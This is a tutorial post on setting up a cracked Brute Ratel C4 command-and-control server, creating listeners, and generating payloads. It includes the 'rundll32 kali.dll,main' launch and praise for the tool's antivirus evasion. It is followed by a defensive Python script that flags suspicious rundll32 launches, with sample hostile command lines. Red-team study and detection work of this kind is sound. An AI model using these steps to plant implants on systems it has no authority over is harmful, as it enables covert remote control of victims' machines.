
In the previous article, we mentioned many C2 framework tools, such as CS and Viper. Today I will share another fun tool with you: Brute Ratel C4.

Deployment

After downloading, unzip the file in Kali.

Install the environment and generate the certificate (optional)

Enter the adhoc_scripts directory, then install the environment and generate the certificate:

chmod +x install.sh

chmod +x genssl.sh

./install.sh

./genssl.sh

Next, give brute-ratel-linx64_crack and lib64/commander execute permissions respectively:

chmod +x brute-ratel-linx64_crack

chmod +x lib64/commander

Next, start the server:

./brute-ratel-linx64_crack -ratel -a admin -p password -h 127.0.0.1:50000 -sc cert.pem -sk key.pem

After execution, copy the generated key.pem and cert.pem to the tool directory.

Parameter description:

-a Username

-p Login password

Next, we start the client:

chmod +x Rungui.sh # Add execute permission to the client

./Rungui.sh

Modify the port, account, password and other information. When you have finished, click on the avatar to log in.

Add listener

As with tools such as CS, we first create a new listener. Click C4 Profiler - Add http Listener.

The parameter configuration example is as follows:

Note: sleep and jitter are similar to the delay time in CS and can be adjusted down. If the checkbox on the last line is ticked and the payload does not come online on its first attempt, it will not make further requests.

Generate shell

Click Save to get a listener. Right-click this listener and select Stageless to generate a payload for the corresponding architecture.

But for some reason, after generating the exe file, the author could not get a shell on the Windows 11 system, and had to generate the dll file instead.

rundll32 kali.dll,main

After running it, the session came online successfully!

At present, its antivirus evasion is quite good.
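Since the post reports that antivirus did not flag the DLL, process-creation logs for the rundll32 launch above are a more dependable place to detect it. The following is an added example, not part of the original post: it scores rundll32 command lines, where the sample log lines are constructed and the path and export-name heuristics are assumptions to tune against your own baseline.

```python
import re

# Constructed process-creation command lines (the kind of value found in a
# Sysmon Event ID 1 "CommandLine" field). Only the first comes from the post.
SAMPLE_EVENTS = [
    r'rundll32 kali.dll,main',
    r'C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL desk.cpl',
    r'"C:\Windows\System32\rundll32.exe" "C:\Users\bob\Downloads\update.dll",main',
    r'rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie host http://example.invalid/',
    r'notepad.exe C:\Users\bob\notes.txt',
    r'rundll32 shell32.dll,Control_RunDLL',
]

# rundll32[.exe] <dll>,<export-or-#ordinal>, with optional quoting and full path.
RUNDLL = re.compile(
    r'^\s*"?(?:[^"]*\\)?rundll32(?:\.exe)?"?\s+"?(?P<dll>[^",]+?)"?\s*,\s*(?P<export>[#\w]+)',
    re.IGNORECASE)

# Assumed heuristics for this example; tune them against your own baseline.
TRUSTED_DIRS = ('c:\\windows\\system32\\', 'c:\\windows\\syswow64\\')
USER_WRITABLE = ('\\users\\', '\\programdata\\', '\\temp\\')
GENERIC_EXPORTS = {'main', 'start', 'run'}

def score(cmdline):
    """Return a list of reasons, or None if the line is not a rundll32 launch."""
    m = RUNDLL.match(cmdline)
    if not m:
        return None
    dll, export = m.group('dll').lower(), m.group('export').lower()
    reasons = []
    if '\\' not in dll and '/' not in dll:
        reasons.append('bare DLL name, resolved via search path / current directory')
    elif not dll.startswith(TRUSTED_DIRS):
        reasons.append('DLL outside System32/SysWOW64')
    if any(part in dll for part in USER_WRITABLE):
        reasons.append('DLL in a user-writable location')
    if export in GENERIC_EXPORTS:
        reasons.append('generic export name')
    return reasons

def triage(events, threshold=2):
    """Keep launches with at least `threshold` reasons; one alone is too noisy."""
    scored = ((line, score(line)) for line in events)
    return [(l, r) for l, r in scored if r is not None and len(r) >= threshold]

if __name__ == '__main__':
    for line, reasons in triage(SAMPLE_EVENTS):
        print(f'ALERT {line!r}: ' + '; '.join(reasons))
```

A bare system DLL name such as shell32.dll trips only one heuristic, which is why the threshold is two.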


Related Operations

Command terminal

File browser

Of course, there are many fun features. We will update it for you in later articles!

Summary

Advantages: Its antivirus evasion is very good, it is similar to tools such as CS, and the entry threshold is low.

Deficiencies: Currently only Windows payloads are supported. I hope payloads for other platforms will be added later.
